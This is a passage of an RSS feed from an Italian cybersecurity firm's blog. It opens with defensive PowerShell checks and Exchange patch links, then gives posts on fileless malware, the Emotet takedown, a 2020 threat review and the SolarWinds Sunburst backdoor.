    NextRun = $(($_ | Get-ScheduledTaskInfo).NextRunTime)
    Status = $_.State
    Command = $_.Actions.execute
    Arguments = $_.Actions.Arguments
    }
    } | ConvertTo-Json

• [winev] Controllare tramite EV Winev_System la presenza di system ID: 7045 alla ricerca di servizi sospetti

• [users] Controllare gli utenti creati dopo una data {QUESTO CONTROLLO VA EFFETTUATO SOLO SU UNO DEI DOMAIN CONTROLLER}:

    Get-ADUser -Filter * -Properties whenCreated | where {$_.whenCreated -gt $((Get-Date).AddDays(-10))} | FT Name, whenCreated
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;B. &lt;strong&gt;ESEGUIRE LE PATCH DELLE VULNERABILITÀ&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Azione da effettuare il prima possibile nel caso in cui il server &lt;strong&gt;NON sia stato ancora compromesso&lt;/strong&gt;. Di seguito le patch per ogni versione di Microsoft Exchange Server:&lt;/p&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Microsoft Exchange Server&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;

&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exchange 2019 CU8&lt;/td&gt;
&lt;td&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/download/details.aspx?id=102770&#34;&gt;https://www.microsoft.com/en-us/download/details.aspx?id=102770&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;Exchange 2019 CU7&lt;/td&gt;
&lt;td&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/download/details.aspx?id=102771&#34;&gt;https://www.microsoft.com/en-us/download/details.aspx?id=102771&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;Exchange 2016 CU19&lt;/td&gt;
&lt;td&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/download/details.aspx?id=102772&#34;&gt;https://www.microsoft.com/en-us/download/details.aspx?id=102772&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;Exchange 2016 CU18&lt;/td&gt;
&lt;td&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/download/details.aspx?id=102773&#34;&gt;https://www.microsoft.com/en-us/download/details.aspx?id=102773&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;Exchange 2013 CU23&lt;/td&gt;
&lt;td&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/download/details.aspx?id=102775&#34;&gt;https://www.microsoft.com/en-us/download/details.aspx?id=102775&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;

&lt;tr&gt;
&lt;td&gt;Exchange 2010 SP3 RU32&lt;/td&gt;
&lt;td&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/download/details.aspx?id=102774&#34;&gt;https://www.microsoft.com/en-us/download/details.aspx?id=102774&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Se dovessi rilevare una compromissione nel sistema e desiderassi il nostro supporto puoi mandarci una mail a &lt;strong&gt;sos@cybergon.com&lt;/strong&gt; con i dettagli della richiesta.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Quando l&#39;attacco non fa rumore: i malware fileless</title>
         <link>https://blog.cybergon.com/posts/quando-attacco-non-fa-rumore-malware-fileless/</link>
         <pubDate>Thu, 18 Feb 2021 10:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Jeremy Moeys</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/quando-attacco-non-fa-rumore-malware-fileless/</guid>
         <description>

&lt;p&gt;Sun Tzu, ne “L’arte della guerra” pone il silenzio come presupposto della sorpresa, della superiorità e infine della vittoria. Anche quando ci riferiamo all&amp;rsquo;anatomia di un attacco informatico, il silenzio gioca un ruolo fondamentale.&lt;/p&gt;

&lt;p&gt;I &lt;strong&gt;malware fileless&lt;/strong&gt; hanno la caratteristica di non lasciare file – appunto – sul disco del dispositivo, ma di risiedere in memoria, rendendosi di fatto silenti. Con l’avanzare delle tecnologie i cyber criminali hanno ridotto al minimo contenuti malevoli all’interno dei file per bypassare i sistemi di difesa tradizionale su cui molte aziende ancora oggi si basano: gli antivirus.
Tra i &lt;a href=&#34;https://www.eset.com/int/about/newsroom/press-releases/research/ransomware-and-fileless-malware-to-present-increased-threat-in-2021-predict-eset/&#34;&gt;cyber security trend 2021&lt;/a&gt; identificati da Eset i &lt;em&gt;malware fileless&lt;/em&gt; sono stati indicati come &lt;strong&gt;minaccia in evoluzione&lt;/strong&gt; e che potrebbe presto essere utilizzata su larga scala.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/malware-silenti/fileless-malware.jpg&#34; alt=&#34;fileless-malware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;I &lt;em&gt;fileless&lt;/em&gt; nascono in origine per lo spionaggio e gli attacchi più avanzati, ma hanno preso piede di recente con il sistema del &lt;a href=&#34;https://cybergon.com/blog/posts/il-business-dietro-al-business-cybercrime-as-a-service/&#34;&gt;cybercrime-as-a-service&lt;/a&gt;, che prevede la reperibilità nel dark web di toolkit pronti all’uso.&lt;/p&gt;

&lt;p&gt;Questi attacchi hanno &lt;strong&gt;l’obiettivo specifico di esflitrare brevetti e PII&lt;/strong&gt;, informazioni personali che sono direttamente riconducibili a identità reali (come mail, password, indirizzi). La natura degli attacchi informatici però è mutevole, come possono esserlo gli obiettivi per cui viene fatto. Dal momento che a guidarli sono esperti che possono adattare le proprie difese e strategie di evasione per rendersi ancor più furtivi, possiamo aspettarci un&amp;rsquo;evoluzione anche per quello che riguarda il bersaglio di questi attacchi: oggi &amp;ldquo;solamente&amp;rdquo; i dati sensibili, domani potremmo assistere a un cambio di paradigma.&lt;/p&gt;

&lt;h2 id=&#34;il-caso-gootkit-e-la-campagna-tedesca&#34;&gt;Il caso Gootkit e la campagna tedesca&lt;/h2&gt;

&lt;p&gt;Gootkit è un &lt;em&gt;banking trojan&lt;/em&gt; che ha fatto la sua comparsa nel giugno del 2018 e che si è da subito guadagnato un posto di tutto rispetto nella classifica dei &lt;strong&gt;malware più efficaci e pericolosi&lt;/strong&gt; degli ultimi anni. Riesce ad &lt;strong&gt;infiltrarsi in modo silente nel sistema&lt;/strong&gt;: la sua funzione principale è quella di registrare, attraverso la pressione dei tasti, le password che vengono digitate dall’amministratore di sistema per poi compromettere l’intera infrastruttura della vittima.&lt;/p&gt;

&lt;p&gt;È importante per l’attaccante tenere nascosta l&amp;rsquo;intrusione così da poter mantenere un vantaggio e &lt;strong&gt;sovvertire successivamente il sistema operativo&lt;/strong&gt; a suo piacimento. Oltre alle password infatti, Gootkit fornisce accesso remoto ai sistemi tramite &lt;em&gt;backdoor&lt;/em&gt;, riesce a filmare tramite la webcam del pc ed infine inietta &lt;em&gt;script malevoli&lt;/em&gt; per fare collection di credenziali bancarie.&lt;/p&gt;

&lt;p&gt;L’ultimo ingresso in scena è stato alla fine di novembre, ha affiancato un’altra celebrità tra i malware: il ransomware REvil, in una campagna diffusa in Germania.&lt;/p&gt;

&lt;p&gt;In quest’ultimo attacco il mezzo di diffusione è stato &lt;em&gt;WordPress&lt;/em&gt;, considerato tra i CMS più vulnerabili di sempre. La modalità per ingannare gli utenti prevede di postare falsi contenuti sotto forma di domande e risposte sui forum dei siti web tedeschi basati su WP.
L’utente ignaro cliccando sul link scarica un file ZIP con contenuto offuscato in &lt;em&gt;JavaScript&lt;/em&gt; che installa il malware. Lanciando lo script viene poi contattato il server Command&amp;amp;Control e scaricato un altro script che contiene il &lt;em&gt;payload malevolo&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/malware-silenti/wordpress-forum-fileless.png&#34; alt=&#34;wordpress-forum-fileless&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;la-detection-degli-attacchi-silenti&#34;&gt;La detection degli attacchi silenti&lt;/h2&gt;

&lt;p&gt;Rilevare un malware di questa tipologia può essere davvero complicato dal momento che la loro prima preoccupazione dopo aver breachato il perimetro è di &lt;strong&gt;disabilitare i log del sistema operativo e le funzioni dei programmi che possono rilevarli&lt;/strong&gt; e bloccarli. Per riuscire nell’impresa vengono adottate diverse tecniche: il polimorfismo, la continua rigenerazione di hash, meccanismi di occultamento del codice di cui sono due esempi illustri Trickbot e Ryuk.&lt;/p&gt;

&lt;p&gt;Contrariamente a quanto si crede, i fileless non sono meno efficaci di malware comuni: i payload sono esattamente gli stessi.
Tramite la Powershell, l’attaccante esegue i comandi necessari da remoto e può farlo principalmente attraverso due modalità di esecuzione: nella prima l’utente &lt;strong&gt;scarica un file&lt;/strong&gt; che non risulta essere malevolo ma al cui interno risiede lo script offuscato; nella seconda viene &lt;strong&gt;sfruttata una vulnerabilità&lt;/strong&gt; per l’RCE, la Remote Code Execution. La percentuale di successo dell’attacco è molto elevata in entrambi i casi.&lt;/p&gt;

&lt;p&gt;Secondo il &lt;em&gt;Ponemon Cost of a Data Breach Study 2020&lt;/em&gt; il tempo medio di &lt;strong&gt;detection di un data breach è di 197 giorni&lt;/strong&gt;.
La complessità di detection di questi attacchi è notevolmente aumentata poichè la Cyber Kill Chain tradizionale non riesce più a rispondere alle esigenze di difesa del perimetro aziendale. Se non si è dotati di &lt;strong&gt;strumenti di detection avanzati&lt;/strong&gt;, l’unico modo per accorgersi di una compromissione silente è quando un servizio va offline, ma quel momento rappresenta il sintomo ed è ormai troppo tardi.&lt;/p&gt;

&lt;p&gt;Quando un ransomware colpisce un’azienda, una efficace strategia di difesa permette di portare alla luce l’”intruso”; la stessa condizione non si verifica nel caso di un attacco silente che &lt;strong&gt;non riesce ad essere individuato per lunghi periodi di tempo&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Utilizzando un gioco di parole, nelle aziende la &lt;strong&gt;non-evidenza di un attacco informatico&lt;/strong&gt; viene percepita come non-evidenza di un data breach. A volte però i criminali informatici utilizzano un diversivo, lo stesso genere di &lt;em&gt;“noise”&lt;/em&gt; con il quale mascherano le vere intenzioni di un attacco che vanno ricercate sì nell’esfiltrazione di dati, ma non si limitano lì. Il dato non ha un valore universalmente riconosciuto, ma per ogni specifico caso l’informazione assume valore quanto più è correlabile ad altre o in base allo scopo finale. Per questo un attacco può essere perpetrato per assumere vantaggio competitivo, per denaro, per ottenere brevetti e proprietà intellettuale, per vendetta, per ideologia.&lt;/p&gt;

&lt;p&gt;&lt;a href=&#34;https://bit.ly/3qB0LlN&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/malware-silenti/donwload-libri-cybergon.JPG&#34; alt=&#34;donwload-libri-cybergon&#34; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Due attacchi in particolare nel mondo cyber sono capaci di generare tale caos e rumore: il primo è sicuramente il già citato &lt;strong&gt;ransomware&lt;/strong&gt; che riesce a criptare tutti i file e riesce a limitare le azioni di forensics per comprendere come si è stati attaccati e capire quali dati siano stati compromessi diventa un processo critico. A tal proposito solo recentemente abbiamo visto l’evoluzione del ransomware in &lt;em&gt;leakware&lt;/em&gt;: un potente esfiltratore di dati che pone ulteriore pressione sulla vittima ricattandola di &lt;strong&gt;pubblicare i dati sensibili online&lt;/strong&gt; in caso di mancato pagamento.&lt;/p&gt;

&lt;p&gt;Il secondo tipo di attacco si chiama &lt;em&gt;DDoS, Distributed Denial of Service&lt;/em&gt;, letteralmente «Interruzione distribuita di servizio»: una minaccia informatica che tempesta di richieste un sito o un’infrastruttura IT allo scopo di fargli superare la capacità di gestione e impedirgli di funzionare correttamente.&lt;/p&gt;

&lt;p&gt;L’anomalia, evidenza di un possibile incident, a volte compare come una impercettibile onda sonora di sottofondo che solo i più sensibili strumenti di detection sono in grado di cogliere oppure come fragoroso frastuono scatenato dai gruppi criminali e dalle loro botnet.&lt;/p&gt;

&lt;p&gt;La frase “Se ci sono due aziende una è stata attaccata, l’altra lo sarà” dovrebbe forse essere ripensata in “Se ci sono due aziende una è stata attaccata, l’altra ancora non lo sa”.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Il Re è morto, viva il Re</title>
         <link>https://blog.cybergon.com/posts/la-fine-di-emotet-operazione-europol/</link>
         <pubDate>Fri, 29 Jan 2021 10:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Sara Loprete</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/la-fine-di-emotet-operazione-europol/</guid>
         <description>

&lt;p&gt;Il mondo della Cyber Security è fatto di attacchi spietati, furti e rivendita di dati, danni milionari. Ma è fatto anche di difesa organizzata e di contrattacchi.&lt;/p&gt;

&lt;p&gt;Un’operazione congiunta globale – chiamata &lt;em&gt;Operazione Ladybird&lt;/em&gt; – coordinata da Europol ed Eurojust e a cui hanno preso parte le forze dell’ordine e le autorità giudiziarie di Paesi Bassi, Germania, Stati Uniti, Regno Unito, Francia, Lituania, Canada e Ucraina ha permesso &lt;strong&gt;l’interruzione della botnet Emotet&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/la-fine-di-emotet/emotet-takedown.png&#34; alt=&#34;la-fine-di-emotet&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Emotet è apparso come Banking Trojan nel 2014 e nel corso di questi anni ha raggiunto il picco della diffusione e della notorietà, arrivando a costare, secondo il Dipartimento Homeland Security, &lt;strong&gt;oltre 1 milione di dollari&lt;/strong&gt; alle organizzazioni colpite. A dicembre 2020 ha scalato la classifica dei malware più diffusi stilata da Check Point, piazzandosi al primo posto. Tra marzo e aprile, durante il primo lockdown Emotet è tornato sulla scena con campagne di phishing a tema Covid-19, che abbiamo &lt;a href=&#34;https://cybergon.com/blog/posts/phishing-ai-tempi-dello-smartworking-un-report/&#34;&gt;analizzato qui&lt;/a&gt;.&lt;/p&gt;

&lt;h2 id=&#34;i-dettagli-dell-operazione&#34;&gt;I dettagli dell&amp;rsquo;operazione&lt;/h2&gt;

&lt;p&gt;Per l’operazione è stato adottato un approccio nuovo: dopo due anni di indagini e lavoro coordinato, le forze dell&amp;rsquo;ordine e le autorità giudiziarie hanno acquisito il &lt;strong&gt;controllo dell&amp;rsquo;infrastruttura backend&lt;/strong&gt; di Emotet e l&amp;rsquo;hanno rimossa dall&amp;rsquo;interno.
Numerosi esperti di sicurezza hanno lavorato per dirottare simultaneamente centinaia di server &lt;em&gt;command-and-control&lt;/em&gt; situati in tutto il mondo, con l’obiettivo appunto di tracciare e distruggere la botnet.&lt;/p&gt;

&lt;p&gt;Hanno silenziosamente &lt;strong&gt;sostituito macchine di loro proprietà negli indirizzi IP&lt;/strong&gt; in cui c’erano quelle di Emotet, molte delle quali erano computer precedentemente compromessi e utilizzati per la gestione della botnet, quindi hanno preso il controllo di un server C&amp;amp;C dopo l’altro.
In questo modo se una macchina vittima raggiungesse uno degli attuali server, riceverebbe un payload inerte che impedirà ulteriori comunicazioni con la botnet, di fatto sterilizzando ogni pericolo ulteriore.&lt;/p&gt;

&lt;p&gt;In passato, operazioni simili hanno portato a un (solamente) temporaneo abbattimento delle botnet, che si ripresentavano poco dopo.
Gli autori dell’operazione si dicono fiduciosi che questo non accadrà. Nella dichiarazione della polizia olandese si è reso noto di aver scoperto e &lt;strong&gt;interrotto tutti i backup&lt;/strong&gt; delle infrastrutture, e di aver monitorato i processi per intercettare eventuali tecniche di recovery alternative, così da impedire la ricostruzione di Emotet.&lt;/p&gt;

&lt;p&gt;Se Emotet fosse stato distrutto in modo permanente - il condizionale è d&amp;rsquo;obbligo - il takedown potrebbe effettivamente rappresentare un duro colpo per gli operatori di ransomware in tutto il mondo che hanno causato miliardi di dollari di danni e persino messo in pericolo vite umane all&amp;rsquo;interno di ospedali presi di mira con i loro tentativi di estorsione, in quanto Emotet ha rappresentato il punto di appoggio per lo sviluppo di altri trojan.&lt;/p&gt;

&lt;p&gt;L’operazione Ladybird ha portato inoltre all’arresto di due membri ucraini del gruppo (TA542) e all’identificazione di altri autori.&lt;/p&gt;

&lt;p&gt;Mentre le indagini sono ancora in corso, tra le scoperte fatte nel corso dell’operazione fino ad ora è emerso un &lt;strong&gt;database contenente gli indirizzi email&lt;/strong&gt; raccolti dalla botnet. La polizia olandese ha messo a disposizione &lt;a href=&#34;https://www.politie.nl/themas/controleer-of-mijn-inloggegevens-zijn-gestolen.html&#34;&gt;un portale&lt;/a&gt; in cui inserire la propria mail per verificarne la presenza nella raccolta e in caso di risposta affermativa, ricevere una mail di approfondimento.&lt;/p&gt;

&lt;p&gt;Forse possiamo escludere il ritorno della botnet per come la conosciamo, ma non possiamo assicurarci che gli autori e i membri ancora in circolazione non daranno vita a nuove avventure criminali, tornando – ad esempio – sottoforma di APT.
Così come insegna la mitologia: Ercole dopo aver tagliato una testa all’Idra, dovette affrontarne due.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Almanacco 2020: eventi e trend</title>
         <link>https://blog.cybergon.com/posts/almanacco-2020-eventi-e-trend/</link>
         <pubDate>Thu, 07 Jan 2021 10:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Lucchina</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/almanacco-2020-eventi-e-trend/</guid>
         <description>

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2020/almanacco-eventi-trend.jpg&#34; alt=&#34;almanacco-2020-eventi-trend&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Si chiude l’anno in cui l’Italia ha visto il maggior numero di morti annue dal 1944.&lt;/p&gt;

&lt;p&gt;Si chiude l’anno 0 della Cyber Security, quello nel quale TUTTI hanno scoperto &lt;strong&gt;il potere del digitale e il suo lato oscuro&lt;/strong&gt;.
Un anno iniziato con le aziende alla rincorsa di portatili e connessioni VPN per poter dare continuità operativa ai propri collaboratori, proseguito con il cordoglio e la solidarietà nazionale, la rabbia per esserci ricascati e un finale purtroppo all’altezza con il tetro scenario globale.&lt;/p&gt;

&lt;p&gt;Un trittico di notizie che non si credevano possibili: FireEye, una delle principali aziende globali di Cyber Security, è stata oggetto di attacco che ha portato nelle mani dei malintenzionati molti tool di &lt;em&gt;Red Teaming&lt;/em&gt;, quelli utilizzati per forzare i sistemi.
La settimana successiva &lt;strong&gt;il Ministero del Commercio degli Stati Uniti&lt;/strong&gt; e altre importanti agenzie governative sono state attaccate con compromissioni di diversi account email. Lo stesso giorno il sistema di autenticazione di Google non è stato in grado di permettere a milioni di utenti di accedere ai servizi. Nonostante le smentite ufficiali molti vi hanno visto una correlazione.&lt;/p&gt;

&lt;p&gt;Sta di fatto che la paura ha preso il posto del timore. La conferma è arrivata poco dopo ed è ancora più spaventosa dell’ipotesi: nessun concatenamento ma &lt;strong&gt;un unico attacco perpetrato con un vettore inusuale&lt;/strong&gt;: una backdoor inserita in un aggiornamento di &lt;a href=&#34;https://cybergon.com/blog/posts/sunburst-backdoor-nelle-patch-di-solarwind-orion/&#34;&gt;Solarwinds Orion&lt;/a&gt;. La portata dell’attacco non è ancora nota, ma i suoi effetti caratterizzeranno almeno il primo trimestre del nuovo anno.&lt;/p&gt;

&lt;p&gt;Si chiude l’anno della &lt;strong&gt;prima vittima conclamata&lt;/strong&gt; a seguito di un attacco Ransomware, è successo il 17 settembre in Germania, una donna per via della indisponibilità dei sistemi di accettazione del pronto soccorso è stata rinviata verso un’altra struttura; purtroppo è deceduta durante il trasferimento.&lt;/p&gt;

&lt;p&gt;In dicembre è stato segnalato il più cospicuo pagamento in Bitcoin presumibilmente riferibile ad un riscatto: 34 milioni di dollari.
Novembre lo dedichiamo agli &lt;strong&gt;attacchi contro le aziende farmaceutiche&lt;/strong&gt; che stavano sviluppando il &lt;a href=&#34;https://cybergon.com/blog/posts/covid-19-vaccino-gli-attacchi-informatici/&#34;&gt;vaccino contro Sars-Cov-2&lt;/a&gt;. Un attacco ha colpito Moderna, il governo Britannico ha denunciato diversi tentativi da parte di APT e alla fine è toccato all’Agenzia Europea del Farmaco dichiarare che alcune informazioni sui test in corso erano state illegalmente sottratte dai loro sistemi informatici.&lt;/p&gt;

&lt;p&gt;Ottobre invece va alla geopolitica con una non ben definita APT Cinese che ha sottratto i dati personali di metà (!!) dei lavoratori di Taiwan.&lt;/p&gt;

&lt;p&gt;Agosto è stato il mese di Garmin: dopo giorni di fermo del servizio si è diffusa la notizia di un pagamento milionario.&lt;/p&gt;

&lt;p&gt;Luglio il mese che ci ha riportati ai ricordi degli anni Novanta: un diciassettenne di Tampa, in Florida, ha forzato una console di amministrazione di Twitter e ha preso possesso di alcuni account decisamente importanti: Barak Obama, Elon Musk, Apple, Joe Biden, e altri. Per fortuna il suo talento nel forzare il sistema non si è ripetuto nell’ordire truffe; il danno economico si è «limitato» a centomila dollari, quello di immagine per Twitter, invece, non è calcolabile.&lt;/p&gt;

&lt;p&gt;Giugno: Nintendo, Postbank, Foodora, Equifax sono state accumunate dall’obbligo di dichiarare databreach che hanno coinvolto informazioni sensibili dei loro utenti. È stato anche il mese in cui la privacy di Whatsapp ha traballato quando si è scoperto un baco che, in particolari condizioni, pubblicava su Google il numero di telefono dell’utente.&lt;/p&gt;

&lt;p&gt;In maggio è toccato ad Easyjet dichiarare che un numero elevato di informazioni personali dei suoi clienti, compresi i numeri delle carte di credito erano stati compromessi, Nello stesso mese haveibeenpwned ha aggiunto un database da 27 milioni di record contenete nome utente, password e indirizzo email provenienti da LiveJournal, un popolare servizio di blogging.&lt;/p&gt;

&lt;p&gt;I mesi precedenti sono passati in una sorta di sospensione forzata: &lt;strong&gt;il SOC di CybergON&lt;/strong&gt; ha gestito circa un quinto degli incidenti del secondo semestre e abbiamo poi scoperto essere una ratio comune a tutte le organizzazioni che fanno sicurezza. Sono state formulate diverse teorie in merito, la più accreditata, secondo noi, è che la rincorsa a far lavorare le persone in Smart Working abbia aperto un numero significativo di falle ma che, per sfruttarle, i criminali abbiano aspettato la ripresa economica. Questo spiegherebbe l’inusuale numero di aziende industriali italiane colpite da luglio in poi e la gravità del danno subito.&lt;/p&gt;

&lt;h2 id=&#34;aspettative-e-trend-per-il-2021&#34;&gt;Aspettative e trend per il 2021&lt;/h2&gt;

&lt;p&gt;Si apre l’anno 1 della Cyber Security, quello in cui la pericolosità del fenomeno è stato universalmente riconosciuto, quello che vedrà sempre più specialisti e responsabili di infrastrutture e applicazioni dormire sonni agitati con l’aumento delle notizie di compromissioni.&lt;/p&gt;

&lt;p&gt;Ci saremmo augurati di poter iniziare il nuovo anno senza alcune &lt;strong&gt;cattive abitudini&lt;/strong&gt;, ma alla fine ci siamo convinti che ci accompagneranno anche nel 2021:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Oltre la metà degli utenti riutilizza password precedentemente oggetto di un data breach;&lt;/li&gt;
&lt;li&gt;Monitoraggio delle vulnerabilità, aggiornamento dei sistemi, finestre di manutenzioni ordinarie e di emergenza, sono processi strutturati in poche organizzazioni;&lt;/li&gt;
&lt;li&gt;Nome utente e relativa password, scalpellate all’interno del codice applicativo è ancora una pratica in uso e pochi hanno una mappa di quelle in funzione;&lt;/li&gt;
&lt;li&gt;Administrator, admin, SAPadmin, ExchangeAdmin, ecc. devono essere bannati dalle organizzazioni: ogni persona deve essere responsabile delle proprie credenziali e dei livelli di accesso concessi;&lt;/li&gt;
&lt;li&gt;Compartimentare la propria organizzazione dovrebbe essere obbligatorio, altrimenti un CIO non potrebbe neanche entrare in azienda;&lt;/li&gt;
&lt;li&gt;Oggi, non avere dei backup a prova di ransomware è estremamente rischioso;&lt;/li&gt;
&lt;li&gt;I LOG devono essere storicizzati per permettere agli specialisti di capire cosa è successo in caso di attacco. Ovviamente in caso di compromissione di una macchina, l’intruso per prima cosa li cancellerà, quindi devono essere salvati altrove.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Le predizioni, infine, sono quella serie di infruttuosi tentativi di proiettare un trend attuale senza vedere quello in rotta di collisione. Questi sono quelli che abbiamo identificato noi:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Il Cybercrime, rappresentabile come la terza economia al mondo, costerà circa 10 milioni di dollari al secondo per tutto il 2021. Warren Buffet ha recentemente commentato come il Cybercrime, soprattutto per la facilità di entrare in contatto con chiunque tramite il Darkweb, sia il problema numero uno dell’umanità: un attacco informatico è in grado di paralizzare un’organizzazione, una città o un’intera nazione e per questo va considerato alla stregua di un’arma nucleare.&lt;/li&gt;
&lt;li&gt;I danni provocati da Ransomware, che per modalità ed efficacia sono il metodo più facile e veloce per ottenere illeciti guadagni nel breve termine, arriveranno a 20 miliardi di dollari nel 2021.&lt;/li&gt;
&lt;li&gt;La superficie di attacco cresce esponenzialmente, entro il 2023 il numero di dispositivi connessi alla rete triplicherà e la tecnologia 5G deve ancora essere definita dal punto di vista della Cyber Security. Certo sarà possibile connettere tutti i dispositivi di casa direttamente alla rete e beneficiare di maggiore banda, funzionalità e servizi, ma quanto inciderà quel “direttamente” sulla sicurezza?&lt;/li&gt;
&lt;li&gt;La crescente adozione di soluzioni multi-tenant, soprattutto associate alle varie tipologie di Cloud e a fornitori terzi, le renderà estremamente appetibili per gli APT (Advanced Persistent Threat). Quello che è stato fatto utilizzando Solarwinds Orion come vettore è un esempio in questo senso: una compromissione che ha permesso l’accesso a diverse organizzazioni.  Già quest’anno si potrebbe assistere al primo hack (conclamato) di un hyperscaler. Facciano attenzione soprattutto i service provider locali.&lt;/li&gt;
&lt;li&gt;La data economy, da cui dipende la capitalizzazione delle prime dieci aziende globali, raggiungerà presto i 200 zettabytes (10 alla 21 bytes). Tanto oro in tanti caveau.&lt;/li&gt;
&lt;li&gt;Entro il 2025 ci saranno sul cloud 100 zettabytes di dati, circa metà della capacità di archiviazione mondiale. Questo renderà l’identità digitale e i fattori di autenticazione che la regolano la vera architrave della sicurezza delle organizzazioni.&lt;/li&gt;
&lt;li&gt;Nel 2021 l’industria della Cybersecurity dovrà proteggere 300 miliardi di password;&lt;/li&gt;
&lt;li&gt;Nel 2021 ci si aspetta un bel po’ di danni dovuti alla forzatura dei sistemi dei veicoli a guida autonoma.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Concludiamo con la corsa tecnologica: solo in Europa sono operative più di 2000 vendor di Cyber Security, per la prima volta dai tempi di Olivetti anche realtà italiane si stanno affacciando con successo sullo scenario internazionale. I SOC basati su SIEM, universali fino a poco tempo fa, stanno segnando il passo, &lt;strong&gt;il futuro è nell’intelligenza artificiale&lt;/strong&gt;. Scontato vero? Ovviamente un’affermazione del genere non basta, bisogna dire anche il compito assegnatole: dovrà essere in grado di sostituire gli analisti nell’applicare tecniche e tattiche di &lt;strong&gt;REMEDIATION&lt;/strong&gt; in modo da ridurre l’impatto di un attacco. Oggi sono in grado di occuparsi di DETECTION e, in parte, di RESPONSE, ma REMEDIATION e MITIGATION sono ancora totalmente in carico agli umani.
Nonostante questo non risolveremo il problema delle SPAN-PORT.&lt;/p&gt;

&lt;p&gt;Buon 2021 dal team CybergON.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Sunburst: Backdoor nelle patch di SolarWinds Orion</title>
         <link>https://blog.cybergon.com/posts/sunburst-backdoor-nelle-patch-di-solarwind-orion/</link>
         <pubDate>Tue, 15 Dec 2020 09:46:01 +0000</pubDate>
         <authors>
         
              
             <author>Matteo Manzoni</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/sunburst-backdoor-nelle-patch-di-solarwind-orion/</guid>
         <description>

&lt;p&gt;L&amp;rsquo;attacco a diverse agenzie federali e ai Dipartimenti del Tesoro e del Commercio degli Stati Uniti è stato definito come tra i più importanti degli ultimi 5 anni. Un&amp;rsquo;offensiva durata molto tempo e perpetrata sfruttando un aggiornamento di SolarWinds.
Abbiamo analizzato l&amp;rsquo;attacco, come sia stato possibile possibile veicolarlo attraverso l&amp;rsquo;infezione di alcune patch di SolarWinds Orion e quali sono i tool che abbiamo a disposizione per contrastarlo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/sunburst/sunburst-1.jpg&#34; alt=&#34;sunburst-1&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Questa &lt;strong&gt;campagna &lt;a href=&#34;https://cybergon.com/blog/posts/advance-persistent-threat-i-nuovi-cyber-criminali/&#34;&gt;APT&lt;/a&gt; denominata UNC2452&lt;/strong&gt;, tuttora attiva, si presume abbia visto la luce nella primavera 2020 con attacchi &lt;em&gt;malspam&lt;/em&gt; diretti ad alcuni dipendenti SolarWinds. La scelta di questa azienda è stata dettata dal suo parco clienti composto da &lt;strong&gt;target molto appetibili&lt;/strong&gt; dal punto di vista delle informazioni trattate, come il Dipartimento del Tesoro, del Commercio e la Homeland Security Statunitensi.&lt;/p&gt;

&lt;h3 id=&#34;la-dinamica-dell-attacco&#34;&gt;La dinamica dell&amp;rsquo;attacco&lt;/h3&gt;

&lt;p&gt;I threat actors, una volta compromesso un utente di SolarWinds, hanno eseguito delle privilage escalation per arrivare ad &lt;strong&gt;ottenere il certificato di firma digitale&lt;/strong&gt; della società statunitense e le credenziali per l&amp;rsquo;accesso alla repository degli update.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/sunburst/SolarWind_Tampered_Signature_Sandbox.png&#34; alt=&#34;SolarWind_Tampered_Signature_Sandbox&#34; /&gt;&lt;/p&gt;

